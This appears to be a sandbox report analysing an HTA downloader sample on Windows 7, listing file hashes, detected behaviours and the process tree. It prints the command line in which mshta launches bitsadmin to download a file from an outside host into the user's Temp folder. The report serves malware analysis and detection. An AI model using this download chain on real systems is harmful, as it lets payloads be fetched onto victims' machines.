Analysis

max time kernel: 121s
max time network: 123s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 28-08-2024 15:13

Static task: static1
Behavioral task: behavioral1
Sample: Downloader.hta
Resource: win7-20240708-en
5 signatures, 300 seconds
General

Target: Downloader.hta
Size: 828B
MD5: 05a34f1fc75cc308ee7dd8a6dc3e4076
SHA1: eda4d95a33dde083ede19f8d9d4099764fa1a326
SHA256: a536c510d65bb3cfd573a05e0107ab46f427f804431970ecb18c7f173a9ccafd
SHA512: f02ddc254688bd5a4e069203f34fdffbc3905dc446aaed3578fa6f574e955788cb5416ee15bfb5acab970249c6c7563a6ef903cac4189bcc937ac9072f6c4612
Malware Config

Signatures

Download via BitsAdmin (1 TTP, 1 IoC)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 2 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes: mshta.exe, bitsadmin.exe

description | ioc                                                       | process
Key opened  | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe
Key opened  | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bitsadmin.exe

Modifies Internet Explorer settings
Processes: mshta.exe

description | ioc                                                                                                   | process
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe

Suspicious use of WriteProcessMemory (4 IoCs)
Processes: mshta.exe

description                     | pid  | process   | target process
PID 2112 wrote to memory of 592 | 2112 | mshta.exe | bitsadmin.exe
PID 2112 wrote to memory of 592 | 2112 | mshta.exe | bitsadmin.exe
PID 2112 wrote to memory of 592 | 2112 | mshta.exe | bitsadmin.exe
PID 2112 wrote to memory of 592 | 2112 | mshta.exe | bitsadmin.exe
Processes

C:\Windows\SysWOW64\mshta.exe (PID 2112)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Downloader.hta"
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\bitsadmin.exe (PID 592, child of 2112)
    Command line: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://go.enderman.ch/youtube C:\Users\Admin\AppData\Local\Temp\sex
    - Download via BitsAdmin
    - System Location Discovery: System Language Discovery